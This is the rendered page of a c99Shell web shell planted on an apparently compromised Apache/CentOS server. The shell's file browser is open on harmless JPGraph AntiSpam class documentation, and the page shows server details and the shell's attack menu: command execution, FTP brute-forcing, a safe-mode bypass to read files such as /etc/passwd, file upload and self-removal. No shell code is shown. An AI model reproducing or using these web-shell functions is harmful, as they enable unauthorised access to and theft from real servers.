!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/jpgraph/docs/ref/   drwxr-xr-x
Free 52.33 GB of 127.8 GB (40.95%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     AntiSpam.html (7.74 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

CLASS AntiSpam
(Defined in: jpgraph_antispam.php : 546)
 AntiSpam 
 AntiSpam() 
 Rand() 
 Set() 
 Stroke() 
 

Class usage and Overview
This module is used to create AntiSpam challenges that can be used to prevent automatic signup by robots on WEB-pages.

 


Class Methods

 

 

Create a new ANtiSpam challenge image

ArgumentDefaultDescription
$aData  Data to be displayed

Description
This method creates a new instance of the AntiSpam challenge. When the anti-spam imga eis created it is possible to directly use a supplied data string that should be displayed. The data can also be added afterwards with a call to Set() 

Returns
AntiSpam
 
See also
AntiSpam::Set and AntiSpam::Rand

Example

$spam = new AntiSpam();

 

 

Generate a random spam challenge string

ArgumentDefaultDescription
$aLen  Sets the length of the generated string

Description
Instead of specifying the string manually that should be used as a challenge the string can be automatically generated. This is done witha call to the Rand() method.  

Returns
The generated spam challenge string

Example

$antispam = new AntiSpam();
$rval = $antispam->Rand();
...

 

 

Set the spam challenge string

ArgumentDefaultDescription
$aData  Spam challenge

Description
This is an alternative way of specifying the AntiSpam string. This can also be specified in the initial creation of the ANtiSpam object ro be automatically generated with a call to the Rand() method 
 
See also
AntiSpam::Rand

Example

$antispam = new AntiSpam();
...
$antispam->Set($mySpamVal);

 

 

Send the antispam image back to the browser

ArgumentDefaultDescription
$aStrokeFileName  An optional file name

Description
This sends the antispam image back to the browser or to an optional file named as the first and only argument. 

Returns
VOID
 
See also
AntiSpam::AntiSpam and AntiSpam::Rand

Example

$antispam = new AntiSpam();
$rval = $antispam->Rand();
...
$antispam->Stroke()



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0056 ]--